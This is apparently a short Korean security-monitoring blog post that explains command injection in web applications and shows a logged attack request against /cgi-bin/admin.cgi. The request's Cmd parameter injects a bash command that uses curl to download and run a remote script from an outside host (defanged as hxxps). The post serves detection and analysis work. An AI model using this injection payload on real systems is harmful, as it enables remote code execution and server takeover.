반응형
공격설명
명령어 주입 취약점은 웹 어플리케이션에서 발생하는 보안 취약성 중 하나로, 명령 프롬프트나 셸 명령어를 실행하는 부분에서 발생할 수 있다.
공격자는 Command Injection 공격을 통해 웹 서버의 민감한 정보 획득할 수 있고 그에 따라 DB 탈취 및 사용자 인증 우회 등의 연계된 공격을 수행할 수 있다.
공격구문
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash -c "$(curl -fsSL hxxps://gsocket.io/y)" HTTP/1.1
Host:
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Forwarded-Proto: hxxps
X-Forwarded-For:
반응형
'보안관제 이벤트 분석' 카테고리의 다른 글
| [보안관제] 명령어 실행 및 삽입 공격 탐지(Command Injection) (0) | 2024.11.25 |
|---|---|
| [보안관제] 검증 안된 리다이렉트 탐지(Unverified Redirect) (1) | 2024.11.21 |
| [보안관제] 디렉토리 우회공격 시도 탐지 (0) | 2024.11.19 |
| [보안관제] 정보 유출 취약점 공격 탐지 (0) | 2024.11.18 |
| [보안관제] OS 명령어 삽입 시도 탐지(Spring Core Spring4Shell CVE-2022-22965 Command Injection-1) (2) | 2024.11.14 |